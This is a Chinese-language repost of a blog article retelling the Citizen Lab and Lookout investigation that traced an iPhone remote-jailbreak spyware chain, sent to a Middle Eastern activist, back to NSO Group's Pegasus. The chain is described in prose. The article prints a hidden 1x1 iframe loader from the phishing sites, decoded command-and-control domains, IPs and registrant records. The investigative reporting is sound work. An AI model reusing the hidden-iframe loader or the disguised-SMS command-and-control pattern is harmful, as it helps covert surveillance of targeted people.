为什么80%的码农都做不了架构师?>>>   hot3.png

网页中的数行 JavaScrip 代码就能破解你的 iPhone?这不是传说,以色列的一家间谍软件公司在至少在去年初就发现了这个漏洞,之后开发成监控软件卖给中东的情报机构。其主要通过短信传播。只要点击了短信中附带的网址,几分钟内iPhone 自动越狱,获取最高权限并悄悄安装病毒软件,你的手机就是潜伏在口袋里的木马。

1. 意外短信牵出惊天漏洞

Ahmed Mansoor 是中东地区的一名社会活动家,曾在 2011 年因敏感活动没处以收财产、禁止出国以及 8 年刑期,之后又被赦免,从此以后就是官方密切关注的对象。

8 月 10 号清早,他的 iPhone 6(iOS 9.3.3)手机收到一条告密短信,说阿联酋监狱内的政治犯遭受严刑拷打,点击下面的链接就能看到绝密细节。Mansoor 没有理会,只不过短信发送者似乎很焦急,第二天又发送了一条相似的。

可疑短信(来源:Ahmed Mansoor)

Mansoor有前车之鉴 吃过亏,这几年对不明来源的网址都异常小心。这次他没有点击,而是转发给了公民实验室(citizen lab)的研究员。

公民实验室之前就了解到 iPhone 存在可远程越狱的 Zero Day 漏洞,只不过未曾拿到有效的样本。这次终于抓了只活的。为了能彻底弄清病毒原理,公民实验室联系了另一家安全公司 Lookout 共同研究。

他们找来一部同样运行 iOS 9.3.3 系统的 iPhone 5,在自带的浏览器中输入可疑链接,通过检测浏览器数据包,成功监测到注入原理。

浏览器请求记录(来源:citizenlab)

他们发现整个注入过程分为三个步骤。当苹果内置的浏览器 Safari 打开此链接,会立即加载经过混淆了的 JavaScript 代码,这段代码首先会收集用户设备信息回传给远程服务器,这是第一步。

如果是 iPhone 5 及早期设备,JavaScript 代码会通过 XMLHttpRequest 的方式,从远程服务器下载 32 位二进制文件,如果是 iPhone 5S 及更新的设备,便下载 64 位二进制文件,这是第二步。

由于 Safari 浏览器采用的 WebKit 内核,攻击者找到了 WebKit 的内存破坏漏洞,通过这个漏洞,就能让 Javascript 下载的二进制文件得以执行。二进制文件会执行一个函数,该函数可以破解掉苹果的内核保护机制,返回内核运行的真实地址,解开隐藏的运行地址之后,就可以实现越狱,关闭软件签名等保护措施,让这台 iPhone 可以运行任意程序。

远程越狱并安装木马的三个步骤(来源:lookout)

第三步便是间谍软件安装,在这个例子中,间谍软件被打包为 test111.tar,Safari 浏览器会下载此压缩包到 iPhone,然后执行安装。

至此,木马注入流程全部结束,攻击者现在就可以远程启动麦克风,打开摄像头,记录读取通话短信数据、记录行动轨迹,甚至监听邮箱、微信等 App 的内部数据。

研究员并没有善罢甘休就此止步,他们顺藤摸瓜,决心一步一步揭开幕后真凶。

在第二步,研究员侦测到 JavaScript 向远程服务器发出信标,同时截获收到的二进制文件,其中有一段密文,解码后发现是这么一段字符:

Your Google verification code is:5678429
http://gmail.com/?z=FEcCAA==&i=MTphYWxhYW4udHY6NDQzLDE6bWFub3Jhb25saW5lLm5ldDo0NDM=&s=zpvzPSYS674=

看起来就像 Google 的两步安全验证,但其实只是表面的伪装。攻击者 竟然连 Google 验证码的位数都弄错了。

继续解码下面的链接,发现网址 i 参数后面的字符真正的含义是:

1:aalaan.tv:443,1:manoraonline.net:443

研究员判断,aalaan.tv 和 manoraonline.net 这两个网址就是控制 iPhone 手机的幕后服务器。

2. 顺藤摸瓜摸清幕后黑手

利用网址钓鱼在访客设备上安装木马,尤其针对异见人士,这让研究员联想起 2015 年的一次钓鱼事件。英国记者 Rori Donaghy 常年在中东地区活动,9 月份收到一封邮件,邀请他成为某组织成员,附在其后的短网址看起来非常陌生,邮件转交给公民实验室的研究员,经过跟踪果然发现这个链接有猫腻,在转向真实网址之前会加载木马程序。

在针对 Donaghy 的钓事件中,研究员确认了该木马的幕后服务器域名 icloudcacher.com,同时还找到域名登记邮箱 pn1g3p@sigaint.org,继续检索相同邮箱的关联域名,发现有以下三个:

asrarrarabiya.com
asrararabiya.co
asrararablya.com

这三个网站域名类似,并且都没有实质性内容,而是用内嵌的方式嵌入正规网站 asrararabiya.com 的内容,注意这个网站域名和上面三个有细微差别。其代码是这样的:

<iframe src="https://smser.net/9918216t/" width="1" height="1" border="0"></iframe>
<iframe src="http://asrararabiya.com/" style="width:100%; height:1200px; position:absolute; top:-5px; left:-5px;" border="0"></iframe>

此时又发现一个新的网址 smser.net,研究员利用域名 IP 对应数据库,以及专用的网络检索工具如 Shodan、Censys 和 zmap,发现了 237 个存在关联的 IP,提取 SSL 证书还发现,Mansoor 所收到的 iPhone 漏洞钓鱼连接网址也在其中,包括 webadv.co、manoraonline.net,以及 aalaan.tv。

攻击者仿冒的多个网站(来源:citizenlab)

研究员对所有涉及的域名做了分析归类,发现攻击者会仿冒几乎所有类型的网站,其中包括新闻媒体、政府机构、航空公司等。

同时,实验室研究员还分析了这些仿冒域名所面向的国家,发现墨西哥最多,其次是阿联酋,以及其他中东和非洲国家,如土耳其,以色列,泰国,卡塔尔,肯尼亚,乌兹别克斯坦,莫桑比克,摩洛哥,也门,匈牙利,沙乌地阿拉伯,尼日利亚,巴林。

仿冒钓鱼网站的国家分析(源:citizenlab)

研究人员在 Twitter 检索了相关信息,确实发现其他地区 iPhone 用户也有报告收到可疑短信,比如下面这位墨西哥记者 Rafael Cabrera,在 2015 年 8 月 30 日,他收到神秘短信,都是和总统负面新闻相关的线索,下面有短连接,点击后即中招。

这些针对个人电脑,以及针对 iPhone 的钓鱼网站,其所有的 ip 之间都存在关联性,并且技术精湛而且手法相似度很高,研究员越来越怀疑,这幕后团队很有可能是同一伙人。

由于大部分关联域名都设置了隐私保护,IP 地址也可能是多人共用如 VPS,所以要找到真正的主谋并不容易。

研究员还是通过历史域名扫描数据入手,这是 Rapid7 的一个声呐项目,定期扫描全世界所有 IP 的 80 端口,使用 GET 方法请求根目录,再把返回的报文收集归档。

研究员做了归类分析,发现 237 个相关 IP 中,有 19 个 IP 返回的报文一模一样,而且和其他 IP 都不一样。

\xef\xbb\xbf<HTML><HEAD><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.google.com/">\r\n<TITLE></TITLE></HEAD><BODY>\r\n</BODY></HTML>

这 19 个 IP 中,就包含 manoraonline.net 指向的 IP,而这个域名指向的服务器正是 Mansoor 所收到木马的幕后控制主机。

研究人反向检索,按照相同报文检索 IP,发现在 2013 年到 2014 年间,有 83 个 IP 返回这段奇怪的报文,其中有个 IP 引起研究人员的注意,这个 IP 是 82.80.202.200,位于以色列。所返回的完整报文如下:

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 15:28:04 GMT
Accept-Ranges: bytes
ETag: "09a91b3861ce1:0"
Server: Microsoft-IIS/7.5
Date: Mon, 28 Oct 2013 21:23:12 GMT
Connection: close
Content-Length: 127
\xef\xbb\xbf<HTML><HEAD><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.google.com/">
<TITLE></TITLE></HEAD><BODY>
</BODY></HTML>

继续反向检索到此 IP 所对应的域名为 qaintqa.com,这个域名从 2013 年到 2016 年 4 月一直指向这个 IP,并且域名没有设置隐私保护,查询得到的联系人邮箱为 lidorg@nsogroup,而 NSO Group 正是业内极为著名的以色列间谍软件开发商。

Registrant Street: Medinat Hayehudim 85
Registrant City: hertzliya
Registrant State/Province: central
Registrant Postal Code: 46766
Registrant Country: IL
Registrant Phone: 972542228649
Registrant Email: lidorg@nsogroup.com

研究人员还发现,82.80.202.204 和 54.251.49.214 这两个 IP 在 2014 年也返回同样的请求报文,而 82.80.202.204 在 2014 到 2015 年绑定的域名为 mail1.nsogroup.com,后者绑定的域名为 nsoqa.com。

_kPegasusProtocolAgentControlElement_iv
_kPegasusProtocolAgentControlElement_key
_kPegasusProtocolAgentControlElement_ciphertext
_kPegasusProtocolProtocolElement_iv
_kPegasusProtocolProtocolElement_key
_kPegasusProtocolProtocolElement_ciphertext
_kPegasusProtocolResponseElement_iv
_kPegasusProtocolResponseElement_key
_kPegasusProtocolResponseElement_ciphertext

他们还反编译了 iPhone 远程越狱木马在第三个步骤下载的压缩包,其中包含用来监听打电话的库文件 libimo.dylib,以及另外两个用于监听 WhatsApp 和 Viber 的库文件 libvbcalls.dylib 和 libwacalls.dylib,这些库文件都包含这么一串字符:_kPegasusProtocol,而中间的单词 Pegasus 正是 NSO Group 卖给多国情报机构的间谍软件。

NSO Group 是以色列国防部合作伙伴(来源:sibat.mod.gov.il)

种种迹象都表明,以色列情报软件公司 NSO Group 正是 iPhone 远程越狱木马的主谋,也是中东、非洲和南美洲地区多年来病毒木马横行的罪魁祸首。

8 月 11 日 Mansoor 把可疑链接报告给公民实验室的研究员,15 日,研究员弄清远程越狱木马原理并反馈给苹果公司,再到昨天苹果公司发布 iOS 9.3.5 系统更新,终于,这个横行近两年,影响十多个国家地区的远程越狱漏洞才得以被堵住。

题图来源:sibat.mod.gov.il

详细技术细节(英文):Lookout,citizenlab

转载于:https://my.oschina.net/ljc94/blog/739018

iPhone 存高危漏洞秒变木马相关推荐

  1. 联想LSE存高危漏洞 重装系统也无法消除

    本文讲的是 联想LSE存高危漏洞 重装系统也无法消除,联想在其笔记本电脑中隐藏了不可移除的软件,不幸的是,这个软件造成了很大的安全隐患. 如果这个"垃圾"软件从操作系统中被删除,不 ...

  2. android变iphone6s,神奇!利用一个APP,iPhone 6 Plus居然秒变Android手机!

    混迹于明星界和科技圈,果粉林志颖也算是业内有名的"爆料人"了,曾在发布之前就拿到了iPhone 6真机. 这两天,林志颖晒出了一个充满黑科技的视频,这是自2014林志颖晒出iPho ...

  3. SimpliSafe安防系统存高危漏洞:窃贼可轻易攻破

    随着安全研究人员将注意力放到有缺陷的联网设备上,为全美超过20万房主看家的SimpliSafe安防系统,也被曝出了可被简单的'90年代攻击'打破的高危漏洞.SimpliSafe自诩为一套无线警报系统, ...

  4. 协议关键技术_现代通信协议存高危漏洞 或殃及4G和5G手机

    [PConline 资讯]近日,我们从网络安全公司Positive Technologies发布的<2020年LTE和5G网络漏洞>报告中看到,当前移动网络运营商使用的现代通信协议中存在高 ...

  5. 百度在美国遭集体起诉;iPhone 11 成苹果最畅销机型;OpenSSL 曝高危漏洞 | 极客头条...

    整理 | 屠敏 头图 | CSDN 下载自东方 IC 快来收听极客头条音频版吧,智能播报由标贝科技提供技术支持. 「极客头条」-- 技术人员的新闻圈! CSDN 的读者朋友们早上好哇,「极客头条」来啦 ...

  6. 小心!智能合约再爆高危漏洞,两大加密货币直接变废纸!

    小心!智能合约再爆高危漏洞,两大加密货币直接变废纸! 大家都还记得,前一段时间发生的BEC智能合约的安全漏洞问题.近日,智能合约安全问题再次上演,火币Pro发布公告,暂停EDU冲提币业务,随后EDU智 ...

  7. linux 模拟化 iphone,PC 秒变 iPhone!教你在 Windows 上运行 iOS 系统

    原标题:PC 秒变 iPhone!教你在 Windows 上运行 iOS 系统 如果你是一位资深手游玩家,那么你一定会有过在 Windows 电脑上安装手游模拟器的经历:用电脑玩手机游戏一定能秒杀全场 ...

  8. android怎么变iphone,EasyTouch: 让你的Android秒变“iPhone”

    原标题:EasyTouch: 让你的Android秒变"iPhone" 日前,台媒曾在一篇文章里提到,iPhone用户都爱用Assistive Touch,原因是害怕频繁使用Hom ...

  9. 谷歌以54亿美元收购网络安全公司、数百万惠普设备存在高危漏洞|3月10日全球网络安全热点

    安全资讯报告 美国国家安全局(NSA)为保护IT基础设施提出最新建议 这份来自NSA网络安全局的文件鼓励采用"零信任"网络.该报告涵盖网络设计.设备密码和密码管理.远程日志记录和管 ...

最新文章

  1. Analytic Marching:一种基于解析的三维物体网格生成方法
  2. EggNOG功能注释数据库在线和本地使用
  3. 光纤跳线接口的种类及适用范围
  4. 终于,一键打通微信和QQ
  5. perform build_lc_user_stat
  6. 【测评】用这款神器2小时就撸完了1天工作量的代码!爽
  7. 追求卓越追求完美规范学习_追求新的黄金比例
  8. 框架学习 Spring之依赖注入DI
  9. linux传输tcp命令,Linux tcpdump命令帮助和示例
  10. vscode open with live server_vscode容器开发填坑记录remote-container
  11. 化工计算机软件基础考试题,化工原理模拟试题(一)及答案.doc
  12. 读懂金融危机必看的十四本书
  13. NOIP2007 T1奖学金 解题报告-S.B.S.
  14. CR95HF操作命令介绍
  15. 三、Sails 中使用Jwt进行身份认证
  16. Go sync.Pool 浅析
  17. OBS直播时编码器、码率控制器、分辨率帧率是什么以及如何向第三方推流
  18. MySQL DATE_SUB() -- 从日期减去指定的时间间隔
  19. esxi服务器下虚拟机Ubuntu系统搭建PPPoE拨号服务
  20. Adobe安装程序无法初始化的解决方案

热门文章

  1. 科大讯飞:电信客户流失预测挑战赛baseline——Datawhale6月组队打卡笔记(1)
  2. matlab sdm,SDM For Face Alignment 流程介绍及Matlab代码实现之预处理篇
  3. 推断统计 | 学习笔记 (全)
  4. P67、H67、H61、P55、H57、H55 区别
  5. python输出文件名、目录名或卷标语法不正确是为啥_文件名、目录名或卷标语法不正确...
  6. 4.3 C语言的高级用法以及易错点
  7. 你不知道的copy、cut、paste事件——实现页面内容禁止复制,实现复制内容添加额外字段,比如复制请注明出处
  8. AI绘画Midjourney的咒语关键词汇总结
  9. 北京公户京牌指标相关问题详解
  10. 计算机网络的前沿,计算机网络前沿研究.PDF